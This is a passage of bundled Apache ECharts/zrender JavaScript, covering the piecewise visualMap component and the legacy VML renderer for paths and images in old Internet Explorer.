dataIndex: <Array.<number>>}, ...]\n     */\n    findTargetDataIndices: function (pieceIndex) {\n        var result = [];\n\n        this.eachTargetSeries(function (seriesModel) {\n            var dataIndices = [];\n            var data = seriesModel.getData();\n\n            data.each(this.getDataDimension(data), function (value, dataIndex) {\n                // Should always base on model pieceList, because it is order sensitive.\n                var pIdx = VisualMapping.findPieceIndex(value, this._pieceList);\n                pIdx === pieceIndex && dataIndices.push(dataIndex);\n            }, this);\n\n            result.push({seriesId: seriesModel.id, dataIndex: dataIndices});\n        }, this);\n\n        return result;\n    },\n\n    /**\n     * @private\n     * @param {Object} piece piece.value or piece.interval is required.\n     * @return {number} Can be Infinity or -Infinity\n     */\n    getRepresentValue: function (piece) {\n        var representValue;\n        if (this.isCategory()) {\n            representValue = piece.value;\n        }\n        else {\n            if (piece.value != null) {\n                representValue = piece.value;\n            }\n            else {\n                var pieceInterval = piece.interval || [];\n                representValue = (pieceInterval[0] === -Infinity && pieceInterval[1] === Infinity)\n                    ? 0\n                    : (pieceInterval[0] + pieceInterval[1]) / 2;\n            }\n        }\n        return representValue;\n    },\n\n    getVisualMeta: function (getColorVisual) {\n        // Do not support category. (category axis is ordinal, numerical)\n        if (this.isCategory()) {\n            return;\n        }\n\n        var stops = [];\n        var outerColors = [];\n        var visualMapModel = this;\n\n        function setStop(interval, valueState) {\n            var representValue = visualMapModel.getRepresentValue({interval: interval});\n            if (!valueState) {\n                valueState = visualMapModel.getValueState(representValue);\n            }\n            var color = getColorVisual(representValue, valueState);\n            if (interval[0] === -Infinity) {\n                outerColors[0] = color;\n            }\n            else if (interval[1] === Infinity) {\n                outerColors[1] = color;\n            }\n            else {\n                stops.push(\n                    {value: interval[0], color: color},\n                    {value: interval[1], color: color}\n                );\n            }\n        }\n\n        // Suplement\n        var pieceList = this._pieceList.slice();\n        if (!pieceList.length) {\n            pieceList.push({interval: [-Infinity, Infinity]});\n        }\n        else {\n            var edge = pieceList[0].interval[0];\n            edge !== -Infinity && pieceList.unshift({interval: [-Infinity, edge]});\n            edge = pieceList[pieceList.length - 1].interval[1];\n            edge !== Infinity && pieceList.push({interval: [edge, Infinity]});\n        }\n\n        var curr = -Infinity;\n        each$1(pieceList, function (piece) {\n            var interval = piece.interval;\n            if (interval) {\n                // Fulfill gap.\n                interval[0] > curr && setStop([curr, interval[0]], 'outOfRange');\n                setStop(interval.slice());\n                curr = interval[1];\n            }\n        }, this);\n\n        return {stops: stops, outerColors: outerColors};\n    }\n\n});\n\n/**\n * Key is this._mode\n * @type {Object}\n * @this {module:echarts/component/viusalMap/PiecewiseMode}\n */\nvar resetMethods = {\n\n    splitNumber: function () {\n        var thisOption = this.option;\n        var pieceList = this._pieceList;\n        var precision = Math.min(thisOption.precision, 20);\n        var dataExtent = this.getExtent();\n        var splitNumber = thisOption.splitNumber;\n        splitNumber = Math.max(parseInt(splitNumber, 10), 1);\n        thisOption.splitNumber = splitNumber;\n\n        var splitStep = (dataExtent[1] - dataExtent[0]) / splitNumber;\n        // Precision auto-adaption\n        while (+splitStep.toFixed(precision) !== splitStep && precision < 5) {\n            precision++;\n        }\n        thisOption.precision = precision;\n        splitStep = +splitStep.toFixed(precision);\n\n        var index = 0;\n\n        if (thisOption.minOpen) {\n            pieceList.push({\n                index: index++,\n                interval: [-Infinity, dataExtent[0]],\n                close: [0, 0]\n            });\n        }\n\n        for (\n            var curr = dataExtent[0], len = index + splitNumber;\n            index < len;\n            curr += splitStep\n        ) {\n            var max = index === splitNumber - 1 ? dataExtent[1] : (curr + splitStep);\n\n            pieceList.push({\n                index: index++,\n                interval: [curr, max],\n                close: [1, 1]\n            });\n        }\n\n        if (thisOption.maxOpen) {\n            pieceList.push({\n                index: index++,\n                interval: [dataExtent[1], Infinity],\n                close: [0, 0]\n            });\n        }\n\n        reformIntervals(pieceList);\n\n        each$1(pieceList, function (piece) {\n            piece.text = this.formatValueText(piece.interval);\n        }, this);\n    },\n\n    categories: function () {\n        var thisOption = this.option;\n        each$1(thisOption.categories, function (cate) {\n            // FIXME category模式也使用pieceList，但在visualMapping中不是使用pieceList。\n            // 是否改一致。\n            this._pieceList.push({\n                text: this.formatValueText(cate, true),\n                value: cate\n            });\n        }, this);\n\n        // See \"Order Rule\".\n        normalizeReverse(thisOption, this._pieceList);\n    },\n\n    pieces: function () {\n        var thisOption = this.option;\n        var pieceList = this._pieceList;\n\n        each$1(thisOption.pieces, function (pieceListItem, index) {\n\n            if (!isObject$1(pieceListItem)) {\n                pieceListItem = {value: pieceListItem};\n            }\n\n            var item = {text: '', index: index};\n\n            if (pieceListItem.label != null) {\n                item.text = pieceListItem.label;\n            }\n\n            if (pieceListItem.hasOwnProperty('value')) {\n                var value = item.value = pieceListItem.value;\n                item.interval = [value, value];\n                item.close = [1, 1];\n            }\n            else {\n                // `min` `max` is legacy option.\n                // `lt` `gt` `lte` `gte` is recommanded.\n                var interval = item.interval = [];\n                var close = item.close = [0, 0];\n\n                var closeList = [1, 0, 1];\n                var infinityList = [-Infinity, Infinity];\n\n                var useMinMax = [];\n                for (var lg = 0; lg < 2; lg++) {\n                    var names = [['gte', 'gt', 'min'], ['lte', 'lt', 'max']][lg];\n                    for (var i = 0; i < 3 && interval[lg] == null; i++) {\n                        interval[lg] = pieceListItem[names[i]];\n                        close[lg] = closeList[i];\n                        useMinMax[lg] = i === 2;\n                    }\n                    interval[lg] == null && (interval[lg] = infinityList[lg]);\n                }\n                useMinMax[0] && interval[1] === Infinity && (close[0] = 0);\n                useMinMax[1] && interval[0] === -Infinity && (close[1] = 0);\n\n                if (__DEV__) {\n                    if (interval[0] > interval[1]) {\n                        console.warn(\n                            'Piece ' + index + 'is illegal: ' + interval\n                            + ' lower bound should not greater then uppper bound.'\n                        );\n                    }\n                }\n\n                if (interval[0] === interval[1] && close[0] && close[1]) {\n                    // Consider: [{min: 5, max: 5, visual: {...}}, {min: 0, max: 5}],\n                    // we use value to lift the priority when min === max\n                    item.value = interval[0];\n                }\n            }\n\n            item.visual = VisualMapping.retrieveVisuals(pieceListItem);\n\n            pieceList.push(item);\n\n        }, this);\n\n        // See \"Order Rule\".\n        normalizeReverse(thisOption, pieceList);\n        // Only pieces\n        reformIntervals(pieceList);\n\n        each$1(pieceList, function (piece) {\n            var close = piece.close;\n            var edgeSymbols = [['<', '≤'][close[1]], ['>', '≥'][close[0]]];\n            piece.text = piece.text || this.formatValueText(\n                piece.value != null ? piece.value : piece.interval,\n                false,\n                edgeSymbols\n            );\n        }, this);\n    }\n};\n\nfunction normalizeReverse(thisOption, pieceList) {\n    var inverse = thisOption.inverse;\n    if (thisOption.orient === 'vertical' ? !inverse : inverse) {\n            pieceList.reverse();\n    }\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PiecewiseVisualMapView = VisualMapView.extend({\n\n    type: 'visualMap.piecewise',\n\n    /**\n     * @protected\n     * @override\n     */\n    doRender: function () {\n        var thisGroup = this.group;\n\n        thisGroup.removeAll();\n\n        var visualMapModel = this.visualMapModel;\n        var textGap = visualMapModel.get('textGap');\n        var textStyleModel = visualMapModel.textStyleModel;\n        var textFont = textStyleModel.getFont();\n        var textFill = textStyleModel.getTextColor();\n        var itemAlign = this._getItemAlign();\n        var itemSize = visualMapModel.itemSize;\n        var viewData = this._getViewData();\n        var endsText = viewData.endsText;\n        var showLabel = retrieve(visualMapModel.get('showLabel', true), !endsText);\n\n        endsText && this._renderEndsText(\n            thisGroup, endsText[0], itemSize, showLabel, itemAlign\n        );\n\n        each$1(viewData.viewPieceList, renderItem, this);\n\n        endsText && this._renderEndsText(\n            thisGroup, endsText[1], itemSize, showLabel, itemAlign\n        );\n\n        box(\n            visualMapModel.get('orient'), thisGroup, visualMapModel.get('itemGap')\n        );\n\n        this.renderBackground(thisGroup);\n\n        this.positionGroup(thisGroup);\n\n        function renderItem(item) {\n            var piece = item.piece;\n\n            var itemGroup = new Group();\n            itemGroup.onclick = bind(this._onItemClick, this, piece);\n\n            this._enableHoverLink(itemGroup, item.indexInModelPieceList);\n\n            var representValue = visualMapModel.getRepresentValue(piece);\n\n            this._createItemSymbol(\n                itemGroup, representValue, [0, 0, itemSize[0], itemSize[1]]\n            );\n\n            if (showLabel) {\n                var visualState = this.visualMapModel.getValueState(representValue);\n\n                itemGroup.add(new Text({\n                    style: {\n                        x: itemAlign === 'right' ? -textGap : itemSize[0] + textGap,\n                        y: itemSize[1] / 2,\n                        text: piece.text,\n                        textVerticalAlign: 'middle',\n                        textAlign: itemAlign,\n                        textFont: textFont,\n                        textFill: textFill,\n                        opacity: visualState === 'outOfRange' ? 0.5 : 1\n                    }\n                }));\n            }\n\n            thisGroup.add(itemGroup);\n        }\n    },\n\n    /**\n     * @private\n     */\n    _enableHoverLink: function (itemGroup, pieceIndex) {\n        itemGroup\n            .on('mouseover', bind(onHoverLink, this, 'highlight'))\n            .on('mouseout', bind(onHoverLink, this, 'downplay'));\n\n        function onHoverLink(method) {\n            var visualMapModel = this.visualMapModel;\n\n            visualMapModel.option.hoverLink && this.api.dispatchAction({\n                type: method,\n                batch: makeHighDownBatch(\n                    visualMapModel.findTargetDataIndices(pieceIndex),\n                    visualMapModel\n                )\n            });\n        }\n    },\n\n    /**\n     * @private\n     */\n    _getItemAlign: function () {\n        var visualMapModel = this.visualMapModel;\n        var modelOption = visualMapModel.option;\n\n        if (modelOption.orient === 'vertical') {\n            return getItemAlign(\n                visualMapModel, this.api, visualMapModel.itemSize\n            );\n        }\n        else { // horizontal, most case left unless specifying right.\n            var align = modelOption.align;\n            if (!align || align === 'auto') {\n                align = 'left';\n            }\n            return align;\n        }\n    },\n\n    /**\n     * @private\n     */\n    _renderEndsText: function (group, text, itemSize, showLabel, itemAlign) {\n        if (!text) {\n            return;\n        }\n\n        var itemGroup = new Group();\n        var textStyleModel = this.visualMapModel.textStyleModel;\n\n        itemGroup.add(new Text({\n            style: {\n                x: showLabel ? (itemAlign === 'right' ? itemSize[0] : 0) : itemSize[0] / 2,\n                y: itemSize[1] / 2,\n                textVerticalAlign: 'middle',\n                textAlign: showLabel ? itemAlign : 'center',\n                text: text,\n                textFont: textStyleModel.getFont(),\n                textFill: textStyleModel.getTextColor()\n            }\n        }));\n\n        group.add(itemGroup);\n    },\n\n    /**\n     * @private\n     * @return {Object} {peiceList, endsText} The order is the same as screen pixel order.\n     */\n    _getViewData: function () {\n        var visualMapModel = this.visualMapModel;\n\n        var viewPieceList = map(visualMapModel.getPieceList(), function (piece, index) {\n            return {piece: piece, indexInModelPieceList: index};\n        });\n        var endsText = visualMapModel.get('text');\n\n        // Consider orient and inverse.\n        var orient = visualMapModel.get('orient');\n        var inverse = visualMapModel.get('inverse');\n\n        // Order of model pieceList is always [low, ..., high]\n        if (orient === 'horizontal' ? inverse : !inverse) {\n            viewPieceList.reverse();\n        }\n        // Origin order of endsText is [high, low]\n        else if (endsText) {\n            endsText = endsText.slice().reverse();\n        }\n\n        return {viewPieceList: viewPieceList, endsText: endsText};\n    },\n\n    /**\n     * @private\n     */\n    _createItemSymbol: function (group, representValue, shapeParam) {\n        group.add(createSymbol(\n            this.getControllerVisual(representValue, 'symbol'),\n            shapeParam[0], shapeParam[1], shapeParam[2], shapeParam[3],\n            this.getControllerVisual(representValue, 'color')\n        ));\n    },\n\n    /**\n     * @private\n     */\n    _onItemClick: function (piece) {\n        var visualMapModel = this.visualMapModel;\n        var option = visualMapModel.option;\n        var selected = clone(option.selected);\n        var newKey = visualMapModel.getSelectedMapKey(piece);\n\n        if (option.selectedMode === 'single') {\n            selected[newKey] = true;\n            each$1(selected, function (o, key) {\n                selected[key] = key === newKey;\n            });\n        }\n        else {\n            selected[newKey] = !selected[newKey];\n        }\n\n        this.api.dispatchAction({\n            type: 'selectDataRange',\n            from: this.uid,\n            visualMapId: this.visualMapModel.id,\n            selected: selected\n        });\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * DataZoom component entry\n */\n\nregisterPreprocessor(preprocessor$3);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * visualMap component entry\n */\n\nvar urn = 'urn:schemas-microsoft-com:vml';\nvar win = typeof window === 'undefined' ? null : window;\n\nvar vmlInited = false;\n\nvar doc = win && win.document;\n\nfunction createNode(tagName) {\n    return doCreateNode(tagName);\n}\n\n// Avoid assign to an exported variable, for transforming to cjs.\nvar doCreateNode;\n\nif (doc && !env$1.canvasSupported) {\n    try {\n        !doc.namespaces.zrvml && doc.namespaces.add('zrvml', urn);\n        doCreateNode = function (tagName) {\n            return doc.createElement('<zrvml:' + tagName + ' class=\"zrvml\">');\n        };\n    }\n    catch (e) {\n        doCreateNode = function (tagName) {\n            return doc.createElement('<' + tagName + ' xmlns=\"' + urn + '\" class=\"zrvml\">');\n        };\n    }\n}\n\n// From raphael\nfunction initVML() {\n    if (vmlInited || !doc) {\n        return;\n    }\n    vmlInited = true;\n\n    var styleSheets = doc.styleSheets;\n    if (styleSheets.length < 31) {\n        doc.createStyleSheet().addRule('.zrvml', 'behavior:url(#default#VML)');\n    }\n    else {\n        // http://msdn.microsoft.com/en-us/library/ms531194%28VS.85%29.aspx\n        styleSheets[0].addRule('.zrvml', 'behavior:url(#default#VML)');\n    }\n}\n\n// http://www.w3.org/TR/NOTE-VML\n// TODO Use proxy like svg instead of overwrite brush methods\n\nvar CMD$3 = PathProxy.CMD;\nvar round$3 = Math.round;\nvar sqrt = Math.sqrt;\nvar abs$1 = Math.abs;\nvar cos = Math.cos;\nvar sin = Math.sin;\nvar mathMax$9 = Math.max;\n\nif (!env$1.canvasSupported) {\n\n    var comma = ',';\n    var imageTransformPrefix = 'progid:DXImageTransform.Microsoft';\n\n    var Z = 21600;\n    var Z2 = Z / 2;\n\n    var ZLEVEL_BASE = 100000;\n    var Z_BASE$1 = 1000;\n\n    var initRootElStyle = function (el) {\n        el.style.cssText = 'position:absolute;left:0;top:0;width:1px;height:1px;';\n        el.coordsize = Z + ',' + Z;\n        el.coordorigin = '0,0';\n    };\n\n    var encodeHtmlAttribute = function (s) {\n        return String(s).replace(/&/g, '&amp;').replace(/\"/g, '&quot;');\n    };\n\n    var rgb2Str = function (r, g, b) {\n        return 'rgb(' + [r, g, b].join(',') + ')';\n    };\n\n    var append = function (parent, child) {\n        if (child && parent && child.parentNode !== parent) {\n            parent.appendChild(child);\n        }\n    };\n\n    var remove = function (parent, child) {\n        if (child && parent && child.parentNode === parent) {\n            parent.removeChild(child);\n        }\n    };\n\n    var getZIndex = function (zlevel, z, z2) {\n        // z 的取值范围为 [0, 1000]\n        return (parseFloat(zlevel) || 0) * ZLEVEL_BASE + (parseFloat(z) || 0) * Z_BASE$1 + z2;\n    };\n\n    var parsePercent$3 = parsePercent;\n\n    /***************************************************\n     * PATH\n     **************************************************/\n\n    var setColorAndOpacity = function (el, color, opacity) {\n        var colorArr = parse(color);\n        opacity = +opacity;\n        if (isNaN(opacity)) {\n            opacity = 1;\n        }\n        if (colorArr) {\n            el.color = rgb2Str(colorArr[0], colorArr[1], colorArr[2]);\n            el.opacity = opacity * colorArr[3];\n        }\n    };\n\n    var getColorAndAlpha = function (color) {\n        var colorArr = parse(color);\n        return [\n            rgb2Str(colorArr[0], colorArr[1], colorArr[2]),\n            colorArr[3]\n        ];\n    };\n\n    var updateFillNode = function (el, style, zrEl) {\n        // TODO pattern\n        var fill = style.fill;\n        if (fill != null) {\n            // Modified from excanvas\n            if (fill instanceof Gradient) {\n                var gradientType;\n                var angle = 0;\n                var focus = [0, 0];\n                // additional offset\n                var shift = 0;\n                // scale factor for offset\n                var expansion = 1;\n                var rect = zrEl.getBoundingRect();\n                var rectWidth = rect.width;\n                var rectHeight = rect.height;\n                if (fill.type === 'linear') {\n                    gradientType = 'gradient';\n                    var transform = zrEl.transform;\n                    var p0 = [fill.x * rectWidth, fill.y * rectHeight];\n                    var p1 = [fill.x2 * rectWidth, fill.y2 * rectHeight];\n                    if (transform) {\n                        applyTransform(p0, p0, transform);\n                        applyTransform(p1, p1, transform);\n                    }\n                    var dx = p1[0] - p0[0];\n                    var dy = p1[1] - p0[1];\n                    angle = Math.atan2(dx, dy) * 180 / Math.PI;\n                    // The angle should be a non-negative number.\n                    if (angle < 0) {\n                        angle += 360;\n                    }\n\n                    // Very small angles produce an unexpected result because they are\n                    // converted to a scientific notation string.\n                    if (angle < 1e-6) {\n                        angle = 0;\n                    }\n                }\n                else {\n                    gradientType = 'gradientradial';\n                    var p0 = [fill.x * rectWidth, fill.y * rectHeight];\n                    var transform = zrEl.transform;\n                    var scale$$1 = zrEl.scale;\n                    var width = rectWidth;\n                    var height = rectHeight;\n                    focus = [\n                        // Percent in bounding rect\n                        (p0[0] - rect.x) / width,\n                        (p0[1] - rect.y) / height\n                    ];\n                    if (transform) {\n                        applyTransform(p0, p0, transform);\n                    }\n\n                    width /= scale$$1[0] * Z;\n                    height /= scale$$1[1] * Z;\n                    var dimension = mathMax$9(width, height);\n                    shift = 2 * 0 / dimension;\n                    expansion = 2 * fill.r / dimension - shift;\n                }\n\n                // We need to sort the color stops in ascending order by offset,\n                // otherwise IE won't interpret it correctly.\n                var stops = fill.colorStops.slice();\n                stops.sort(function (cs1, cs2) {\n                    return cs1.offset - cs2.offset;\n                });\n\n                var length$$1 = stops.length;\n                // Color and alpha list of first and last stop\n                var colorAndAlphaList = [];\n                var colors = [];\n                for (var i = 0; i < length$$1; i++) {\n                    var stop = stops[i];\n                    var colorAndAlpha = getColorAndAlpha(stop.color);\n                    colors.push(stop.offset * expansion + shift + ' ' + colorAndAlpha[0]);\n                    if (i === 0 || i === length$$1 - 1) {\n                        colorAndAlphaList.push(colorAndAlpha);\n                    }\n                }\n\n                if (length$$1 >= 2) {\n                    var color1 = colorAndAlphaList[0][0];\n                    var color2 = colorAndAlphaList[1][0];\n                    var opacity1 = colorAndAlphaList[0][1] * style.opacity;\n                    var opacity2 = colorAndAlphaList[1][1] * style.opacity;\n\n                    el.type = gradientType;\n                    el.method = 'none';\n                    el.focus = '100%';\n                    el.angle = angle;\n                    el.color = color1;\n                    el.color2 = color2;\n                    el.colors = colors.join(',');\n                    // When colors attribute is used, the meanings of opacity and o:opacity2\n                    // are reversed.\n                    el.opacity = opacity2;\n                    // FIXME g_o_:opacity ?\n                    el.opacity2 = opacity1;\n                }\n                if (gradientType === 'radial') {\n                    el.focusposition = focus.join(',');\n                }\n            }\n            else {\n                // FIXME Change from Gradient fill to color fill\n                setColorAndOpacity(el, fill, style.opacity);\n            }\n        }\n    };\n\n    var updateStrokeNode = function (el, style) {\n        // if (style.lineJoin != null) {\n        //     el.joinstyle = style.lineJoin;\n        // }\n        // if (style.miterLimit != null) {\n        //     el.miterlimit = style.miterLimit * Z;\n        // }\n        // if (style.lineCap != null) {\n        //     el.endcap = style.lineCap;\n        // }\n        if (style.lineDash) {\n            el.dashstyle = style.lineDash.join(' ');\n        }\n        if (style.stroke != null && !(style.stroke instanceof Gradient)) {\n            setColorAndOpacity(el, style.stroke, style.opacity);\n        }\n    };\n\n    var updateFillAndStroke = function (vmlEl, type, style, zrEl) {\n        var isFill = type === 'fill';\n        var el = vmlEl.getElementsByTagName(type)[0];\n        // Stroke must have lineWidth\n        if (style[type] != null && style[type] !== 'none' && (isFill || (!isFill && style.lineWidth))) {\n            vmlEl[isFill ? 'filled' : 'stroked'] = 'true';\n            // FIXME Remove before updating, or set `colors` will throw error\n            if (style[type] instanceof Gradient) {\n                remove(vmlEl, el);\n            }\n            if (!el) {\n                el = createNode(type);\n            }\n\n            isFill ? updateFillNode(el, style, zrEl) : updateStrokeNode(el, style);\n            append(vmlEl, el);\n        }\n        else {\n            vmlEl[isFill ? 'filled' : 'stroked'] = 'false';\n            remove(vmlEl, el);\n        }\n    };\n\n    var points$3 = [[], [], []];\n    var pathDataToString = function (path, m) {\n        var M = CMD$3.M;\n        var C = CMD$3.C;\n        var L = CMD$3.L;\n        var A = CMD$3.A;\n        var Q = CMD$3.Q;\n\n        var str = [];\n        var nPoint;\n        var cmdStr;\n        var cmd;\n        var i;\n        var xi;\n        var yi;\n        var data = path.data;\n        var dataLength = path.len();\n        for (i = 0; i < dataLength;) {\n            cmd = data[i++];\n            cmdStr = '';\n            nPoint = 0;\n            switch (cmd) {\n                case M:\n                    cmdStr = ' m ';\n                    nPoint = 1;\n                    xi = data[i++];\n                    yi = data[i++];\n                    points$3[0][0] = xi;\n                    points$3[0][1] = yi;\n                    break;\n                case L:\n                    cmdStr = ' l ';\n                    nPoint = 1;\n                    xi = data[i++];\n                    yi = data[i++];\n                    points$3[0][0] = xi;\n                    points$3[0][1] = yi;\n                    break;\n                case Q:\n                case C:\n                    cmdStr = ' c ';\n                    nPoint = 3;\n                    var x1 = data[i++];\n                    var y1 = data[i++];\n                    var x2 = data[i++];\n                    var y2 = data[i++];\n                    var x3;\n                    var y3;\n                    if (cmd === Q) {\n                        // Convert quadratic to cubic using degree elevation\n                        x3 = x2;\n                        y3 = y2;\n                        x2 = (x2 + 2 * x1) / 3;\n                        y2 = (y2 + 2 * y1) / 3;\n                        x1 = (xi + 2 * x1) / 3;\n                        y1 = (yi + 2 * y1) / 3;\n                    }\n                    else {\n                        x3 = data[i++];\n                        y3 = data[i++];\n                    }\n                    points$3[0][0] = x1;\n                    points$3[0][1] = y1;\n                    points$3[1][0] = x2;\n                    points$3[1][1] = y2;\n                    points$3[2][0] = x3;\n                    points$3[2][1] = y3;\n\n                    xi = x3;\n                    yi = y3;\n                    break;\n                case A:\n                    var x = 0;\n                    var y = 0;\n                    var sx = 1;\n                    var sy = 1;\n                    var angle = 0;\n                    if (m) {\n                        // Extract SRT from matrix\n                        x = m[4];\n                        y = m[5];\n                        sx = sqrt(m[0] * m[0] + m[1] * m[1]);\n                        sy = sqrt(m[2] * m[2] + m[3] * m[3]);\n                        angle = Math.atan2(-m[1] / sy, m[0] / sx);\n                    }\n\n                    var cx = data[i++];\n                    var cy = data[i++];\n                    var rx = data[i++];\n                    var ry = data[i++];\n                    var startAngle = data[i++] + angle;\n                    var endAngle = data[i++] + startAngle + angle;\n                    // FIXME\n                    // var psi = data[i++];\n                    i++;\n                    var clockwise = data[i++];\n\n                    var x0 = cx + cos(startAngle) * rx;\n                    var y0 = cy + sin(startAngle) * ry;\n\n                    var x1 = cx + cos(endAngle) * rx;\n                    var y1 = cy + sin(endAngle) * ry;\n\n                    var type = clockwise ? ' wa ' : ' at ';\n                    if (Math.abs(x0 - x1) < 1e-4) {\n                        // IE won't render arches drawn counter clockwise if x0 == x1.\n                        if (Math.abs(endAngle - startAngle) > 1e-2) {\n                            // Offset x0 by 1/80 of a pixel. Use something\n                            // that can be represented in binary\n                            if (clockwise) {\n                                x0 += 270 / Z;\n                            }\n                        }\n                        else {\n                            // Avoid case draw full circle\n                            if (Math.abs(y0 - cy) < 1e-4) {\n                                if ((clockwise && x0 < cx) || (!clockwise && x0 > cx)) {\n                                    y1 -= 270 / Z;\n                                }\n                                else {\n                                    y1 += 270 / Z;\n                                }\n                            }\n                            else if ((clockwise && y0 < cy) || (!clockwise && y0 > cy)) {\n                                x1 += 270 / Z;\n                            }\n                            else {\n                                x1 -= 270 / Z;\n                            }\n                        }\n                    }\n                    str.push(\n                        type,\n                        round$3(((cx - rx) * sx + x) * Z - Z2), comma,\n                        round$3(((cy - ry) * sy + y) * Z - Z2), comma,\n                        round$3(((cx + rx) * sx + x) * Z - Z2), comma,\n                        round$3(((cy + ry) * sy + y) * Z - Z2), comma,\n                        round$3((x0 * sx + x) * Z - Z2), comma,\n                        round$3((y0 * sy + y) * Z - Z2), comma,\n                        round$3((x1 * sx + x) * Z - Z2), comma,\n                        round$3((y1 * sy + y) * Z - Z2)\n                    );\n\n                    xi = x1;\n                    yi = y1;\n                    break;\n                case CMD$3.R:\n                    var p0 = points$3[0];\n                    var p1 = points$3[1];\n                    // x0, y0\n                    p0[0] = data[i++];\n                    p0[1] = data[i++];\n                    // x1, y1\n                    p1[0] = p0[0] + data[i++];\n                    p1[1] = p0[1] + data[i++];\n\n                    if (m) {\n                        applyTransform(p0, p0, m);\n                        applyTransform(p1, p1, m);\n                    }\n\n                    p0[0] = round$3(p0[0] * Z - Z2);\n                    p1[0] = round$3(p1[0] * Z - Z2);\n                    p0[1] = round$3(p0[1] * Z - Z2);\n                    p1[1] = round$3(p1[1] * Z - Z2);\n                    str.push(\n                        // x0, y0\n                        ' m ', p0[0], comma, p0[1],\n                        // x1, y0\n                        ' l ', p1[0], comma, p0[1],\n                        // x1, y1\n                        ' l ', p1[0], comma, p1[1],\n                        // x0, y1\n                        ' l ', p0[0], comma, p1[1]\n                    );\n                    break;\n                case CMD$3.Z:\n                    // FIXME Update xi, yi\n                    str.push(' x ');\n            }\n\n            if (nPoint > 0) {\n                str.push(cmdStr);\n                for (var k = 0; k < nPoint; k++) {\n                    var p = points$3[k];\n\n                    m && applyTransform(p, p, m);\n                    // 不 round 会非常慢\n                    str.push(\n                        round$3(p[0] * Z - Z2), comma, round$3(p[1] * Z - Z2),\n                        k < nPoint - 1 ? comma : ''\n                    );\n                }\n            }\n        }\n\n        return str.join('');\n    };\n\n    // Rewrite the original path method\n    Path.prototype.brushVML = function (vmlRoot) {\n        var style = this.style;\n\n        var vmlEl = this._vmlEl;\n        if (!vmlEl) {\n            vmlEl = createNode('shape');\n            initRootElStyle(vmlEl);\n\n            this._vmlEl = vmlEl;\n        }\n\n        updateFillAndStroke(vmlEl, 'fill', style, this);\n        updateFillAndStroke(vmlEl, 'stroke', style, this);\n\n        var m = this.transform;\n        var needTransform = m != null;\n        var strokeEl = vmlEl.getElementsByTagName('stroke')[0];\n        if (strokeEl) {\n            var lineWidth = style.lineWidth;\n            // Get the line scale.\n            // Determinant of this.m_ means how much the area is enlarged by the\n            // transformation. So its square root can be used as a scale factor\n            // for width.\n            if (needTransform && !style.strokeNoScale) {\n                var det = m[0] * m[3] - m[1] * m[2];\n                lineWidth *= sqrt(abs$1(det));\n            }\n            strokeEl.weight = lineWidth + 'px';\n        }\n\n        var path = this.path || (this.path = new PathProxy());\n        if (this.__dirtyPath) {\n            path.beginPath();\n            path.subPixelOptimize = false;\n            this.buildPath(path, this.shape);\n            path.toStatic();\n            this.__dirtyPath = false;\n        }\n\n        vmlEl.path = pathDataToString(path, this.transform);\n\n        vmlEl.style.zIndex = getZIndex(this.zlevel, this.z, this.z2);\n\n        // Append to root\n        append(vmlRoot, vmlEl);\n\n        // Text\n        if (style.text != null) {\n            this.drawRectText(vmlRoot, this.getBoundingRect());\n        }\n        else {\n            this.removeRectText(vmlRoot);\n        }\n    };\n\n    Path.prototype.onRemove = function (vmlRoot) {\n        remove(vmlRoot, this._vmlEl);\n        this.removeRectText(vmlRoot);\n    };\n\n    Path.prototype.onAdd = function (vmlRoot) {\n        append(vmlRoot, this._vmlEl);\n        this.appendRectText(vmlRoot);\n    };\n\n    /***************************************************\n     * IMAGE\n     **************************************************/\n    var isImage = function (img) {\n        // FIXME img instanceof Image 如果 img 是一个字符串的时候，IE8 下会报错\n        return (typeof img === 'object') && img.tagName && img.tagName.toUpperCase() === 'IMG';\n        // return img instanceof Image;\n    };\n\n    // Rewrite the original path method\n    ZImage.prototype.brushVML = function (vmlRoot) {\n        var style = this.style;\n        var image = style.image;\n\n        // Image original width, height\n        var ow;\n        var oh;\n\n        if (isImage(image)) {\n            var src = image.src;\n            if (src === this._imageSrc) {\n                ow = this._imageWidth;\n                oh = this._imageHeight;\n            }\n            else {\n                var imageRuntimeStyle = image.runtimeStyle;\n                var oldRuntimeWidth = imageRuntimeStyle.width;\n                var oldRuntimeHeight = imageRuntimeStyle.height;\n                imageRuntimeStyle.width = 'auto';\n                imageRuntimeStyle.height = 'auto';\n\n                // get the original size\n                ow = image.width;\n                oh = image.height;\n\n                // and remove overides\n                imageRuntimeStyle.width = oldRuntimeWidth;\n                imageRuntimeStyle.height = oldRuntimeHeight;\n\n                // Caching image original width, height and src\n                this._imageSrc = src;\n                this._imageWidth = ow;\n                this._imageHeight = oh;\n            }\n            image = src;\n        }\n        else {\n            if (image === 